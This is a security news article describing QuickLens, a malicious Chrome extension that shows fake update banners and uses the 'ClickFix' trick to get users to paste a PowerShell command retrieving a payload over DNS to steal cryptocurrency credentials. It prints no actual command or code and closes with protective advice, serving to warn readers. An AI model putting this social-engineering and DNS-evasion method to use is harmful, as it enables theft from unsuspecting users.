Security researchers have identified a malicious Google Chrome extension named QuickLens that steals cryptocurrency credentials and other sensitive data through a sophisticated attack method. According to a report from Guardio Labs published on , the extension uses deceptive update alerts and a technique dubbed “ClickFix” to trick users into executing malicious code.
The QuickLens extension, once installed, injects a fake “Google Update” pop-up banner onto every webpage a user visits. This persistent alert creates a sense of urgency, prompting users to believe their browser is out of date. One affected user reported, That is appearing in every site i go, i through it could be because Chrome wasn’t updated, but even after uptading it continues to appear.
When a user clicks the fake update button, the attack initiates.
The attack leverages a multi-stage process called ClickFix. After the user clicks the deceptive update, the extension intentionally crashes the browser tab or the entire browser. It then presents the user with a fake error message and instructions to “fix” the issue by opening Windows PowerShell and pasting a command. This command uses the `nslookup` utility to retrieve a malicious PowerShell payload via a DNS query, a method designed to bypass security software. Once executed, this payload compromises the user’s system to steal data, with a primary focus on cryptocurrency wallet credentials.
The primary motivation behind the QuickLens extension and the ClickFix attack is financial theft. By gaining access to cryptocurrency wallets and other sensitive accounts, the attackers can drain funds and sell compromised data. The attack relies on social engineering, exploiting user trust in common browser notifications like update alerts and error messages to persuade them to perform actions they normally would not.
The immediate focus for security providers and Google will be to ensure the extension is removed from official channels and to identify other potential malware using the ClickFix technique. For affected users, the next steps involve securing their accounts and removing the malicious software. This incident highlights the ongoing threat of malicious browser extensions that abuse user trust.
Users are advised to take several precautions to protect themselves from similar threats:
- Regularly review and remove any unnecessary or unfamiliar browser extensions.
- Be highly skeptical of unexpected pop-up alerts, especially those asking for immediate action.
- Never copy and paste commands from a website into a command-line interface like PowerShell or Terminal unless the source is completely trusted.
- Ensure your browser and operating system are kept up-to-date through official channels only.
- Use reputable antivirus and anti-malware software.
Follow Hashlytics on Bluesky, LinkedIn , Telegram and X to Get Instant Updates